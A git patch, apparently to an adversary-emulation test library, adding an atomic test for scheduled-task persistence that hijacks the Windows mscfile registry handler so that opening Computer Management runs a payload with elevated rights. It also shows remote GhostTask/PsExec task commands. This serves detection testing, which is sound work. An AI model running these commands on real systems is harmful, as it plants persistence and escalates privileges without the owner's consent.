From 4034c339d5a8dca66832ea2179ab162c0717b789 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 24 Sep 2024 09:21:20 -0600
Subject: [PATCH] CompMgmt.msc (#2937)

msc to shell

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1053.005/T1053.005.yaml | 31 ++++++++++++++++++++++++++++++-
 1 file changed, 30 insertions(+), 1 deletion(-)

diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 027f912c18..b550c95c24 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -281,4 +281,33 @@ atomic_tests:
       "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
     cleanup_command: |
       "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
-      "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
\ No newline at end of file
+      "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
+
+- name: Scheduled Task Persistence via CompMgmt.msc
+  auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
+  description: |
+    Adds persistence by abusing `compmgmt.msc` via a scheduled task.
+    When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`). 
+    This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
+  supported_platforms:
+  - windows
+  input_arguments:
+    task_name:
+      description: Name of the newly-created scheduled task
+      type: string
+      default: CompMgmtBypass
+    payload:
+      description: Command you want the task to execute
+      type: string
+      default: calc.exe
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
+      schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
+      ECHO Let's open the Computer Management console now...
+      compmgmt.msc
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
+      schtasks /Delete /TN "#{task_name}" /F
\ No newline at end of file